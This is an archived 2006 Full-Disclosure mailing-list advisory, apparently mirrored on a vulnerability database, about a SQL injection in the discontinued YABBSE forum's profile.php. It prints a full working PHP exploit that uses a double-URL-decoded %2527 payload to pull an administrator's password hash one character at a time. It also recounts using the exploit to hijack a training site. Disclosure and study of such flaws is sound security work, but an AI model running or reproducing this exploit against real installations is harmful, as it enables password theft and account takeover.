Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:13292
HistoryJun 23, 2006 - 12:00 a.m.

[Full-disclosure] NDSD-06-001

2006-06-2300:00:00
vulners.com
11
JSON

Hey str0ke - Are you the same str0ke whose code I've been ripping, damn I guess I better release my
first N3td3v Sponsering Disclosure…

NDSD-06-001: YABBSE SQL Injection
June 23, 2006

– Sponsered post

http://lists.grok.org.uk/pipermail/full-disclosure/2006-June/046903.html

– Affected Vendor:
The YABB SE Team

– Affected Products:
YABBSE (This product is discontinued, but unfortunately still seems to be in mainstream use)

– Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary SQL on vulnerable installations of the
YABBSE message board.

The specific flaw exists within the "profile.php" php script which is used to give access to user
profiles.

– Vendor Response:The vendor for this product essentially no longer exists. It is recommended that
you move to a supported message board.

– Disclosure Timeline:
2005.06.26 - Vulnerabiliity Discovered
2005.06.27 - Vendor found to have discontinued support
2006.06.23 - Public release of advisory

– Vulnerability

The vulnerability exists where the user supplied variable $user is processed by the urldecode()
function twice, this allows for the %2527 (decodes to %27 decodes to ') SQL injection technique.

  • Exploit

The following PoC exploit can be used to retrieve any users (IE admin) password hash which in turn can
be used to immitate and login as that user:

**BEGIN PoC Code

<?php
/*
yabbse exploit

all versions - product discontinued

most of the code ripped from http://www.milw0rm.com/exploits/1036
<http://www.milw0rm.com/exploits/1036&gt; so credit to str0ke and milkw0rm
*/

$server = "www.uberhacker.com <http://www.uberhacker.com> ";
$user="Dozix007"
$port = 80;

$hash = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
$idx = 0;
$found = false;

    while&#40; !&#40;$found&#41; &#41; {
            $letter = substr&#40;$hex, $idx, 1&#41;;

            /* &#37;2527 translates to &#37;27, which gets past magic quotes. This is translated to &#39; by

urldecode. */

$url="/cgi-pbin/board/index.php?board=;action=viewprofile;user=$user%2527+AND+mid(passwd,$i,1)=%2527" .
$letter;
$header = getHeader($server, $port, $url, "");
if(!preg_match("/An Error Has Occurred/",$header) ) {
echo $i . ": " . $letter . "\n";
$found = true;
$hash .= $letter;
} else {
$idx++;
}
}
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
$ip = gethostbyname($server);
$fp = fsockopen($ip, $port);

    if &#40;!$fp&#41; {
            return &quot;Unknown&quot;;
    } else {
            $com = &quot;GET $file HTTP/1.1&#92;r&#92;n&quot;;
            $com .= &quot;Host: $server:$port&#92;r&#92;n&quot;;
            $com .= &quot;Connection: close&#92;r&#92;n&quot;;
            $com .= &quot;&#92;r&#92;n&quot;;

            fputs&#40;$fp, $com&#41;;

$header="";

            do {
                    $header.= fread&#40;$fp, 512&#41;;
            } while&#40; !preg_match&#40;&#39;/&#92;r&#92;n&#92;r&#92;n$/&#39;,$header&#41; &#41;;
    }

    return $header;

}
?>
// jazzy2fives 2005-07-26 - mostly stolen from milw0rm.com [2005-06-08]

** End PoC Code

– Patch

It is recomended that if you insist on continuing the use of this product, you remove the line which
reads "$user = urldecode($user);" from all functions in "\sources\proflie.php"

– Credit:

This vulnerability was discovered by me!

– About N3td3v Sponsoring Disclosures:

Established by me, n3td3v sponsering disclosures (NDSD) is a system established to reward n3td3v for
his (her?) posts to full disclosure which bring me more amusement than any 0-day possibly could.

The NDSD is unique in how vulnerability information sponsers the incompetency of n3td3v, for each
amusing n3td3v post NDSD will attempt to release a disclosure of a previously unknown lame exploit.
This is because most valid complaints aginst n3td3v claim that (s/)he contributes nothing to the
secutiy comunity. The aim of NDSD is to sponser n3td3v posts thus ensuring that each directly
corresponds to a positve contribution to FULL-DISCLOSURE.

– Misc

For anyone interested, this was the exploit used to hijack www.uberhacker.com
<http://www.uberhacker.com> - a legal hacker trainng site, which had as their primary challenge to
hijack the website. The site has since had the majority of it's content removed.

NDSD are a subsidiary of empty vessels (www.emptyvessels.org.uk <http://www.emptyvessels.org.uk> ),
one day we might get our website up.

For more information about Aquaterra Leisure, see www.aquaterra.org

To shop for speedo or polar at bargain prices, see www.aquashop.org

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

JSON